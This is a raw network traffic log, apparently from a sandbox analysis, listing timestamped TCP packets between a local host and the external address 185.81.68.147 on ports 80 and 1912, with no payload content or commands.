                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.667942047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.669912100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.669946909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.670166969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.672230005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.672342062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.672415972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.674190998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.674350977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.674501896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.676013947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.676062107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.676125050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.677187920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.677299023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.677367926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.678366899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.679147005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.679194927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.679233074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.681140900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.681303024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.681329012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.683080912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.683240891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.683334112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.685439110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.685600996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.685693026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.687436104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.687525988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.687583923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.689341068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.689382076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.689533949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.691194057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.691349983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.691430092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.692816019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.692914963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.692977905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.694397926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.694502115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.694571972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.696228027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.696394920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.696443081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.697741985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.697807074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.697858095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.699035883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.699239969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.699318886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.700702906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.700898886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.700972080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.702487946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.702579975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.702763081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.704185009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.704266071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.704278946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.705184937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.705288887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.705352068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.706271887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.706336021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.706387997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.707288027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.707366943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.707418919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.708300114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.708364964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.708473921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.709342003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.709451914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.709472895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.711251020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.711270094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.711360931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713206053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713217974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713229895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713241100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713269949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713305950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713510990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713644981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713713884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.714556932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.714664936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.715075970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.715941906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.715955019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.716005087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717020035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717031956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717052937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717817068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717828989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717926979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.718723059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.718830109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.719274044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.719769001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.719885111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.719924927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.726267099 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.831100941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.831224918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.831633091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.831811905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.832725048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.832894087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.833301067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.833301067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.833301067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.833777905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.833841085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.833888054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.834745884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.834872007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.835773945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.835800886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.835819006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.836095095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.836868048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.836965084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.837943077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.838093996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.838170052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.838892937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.839004993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.839173079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.839173079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.839864969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.839947939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.840944052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.841049910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.841164112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.841164112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.841840029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.841928005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.842279911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.842794895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.842864037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.842959881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.843822956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.843914032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.844261885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.844743013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.844841957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.845021009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.845684052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.845721960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.845896006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.846751928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.846899033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.847168922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.847527981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.847675085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.848495960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.848611116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.848686934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.848710060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.849478006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.849558115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.849885941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.850423098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.850480080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.851363897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.851435900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.851535082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.851535082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.852303982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.852412939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.852513075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.853264093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.853329897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.853482008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.854306936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.854381084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.854763985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.855160952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.855215073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.855370998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.856098890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.856156111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.856261015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.857076883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.857177019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.857405901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.858052969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.858141899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.858635902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.859052896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.859082937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.859360933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.859927893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.860043049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.860857964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.860974073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.861071110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.861071110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.861848116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.862023115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.862287998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.862792015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.862891912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.863595009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.863815069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.863912106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.864111900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.864692926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.864785910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.865644932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.865773916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.865948915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.866202116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.866615057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.866750956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.866940975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.867557049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.867661953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.868159056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.868490934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.868618965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.869041920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.869577885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.869667053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.870368004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.870448112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.870527983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.870764017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.871383905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.871498108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.871587038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.872288942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.872344971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.872785091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.873265028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.873285055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.873601913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.874209881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.874322891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.874501944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.875154018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.875220060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.875346899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.876106024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.876502037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.876796961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.877098083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.877162933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.877276897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.878019094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.878099918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.878309965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.878968954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.879043102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.879151106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.880007029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.880074024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.880162954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.880986929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.881050110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.881294966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.882021904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.892901897 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.926023006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.012635946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.022880077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.022957087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.023063898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.023139000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.023205996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.023245096 CET4970980192.168.2.8185.81.68.147
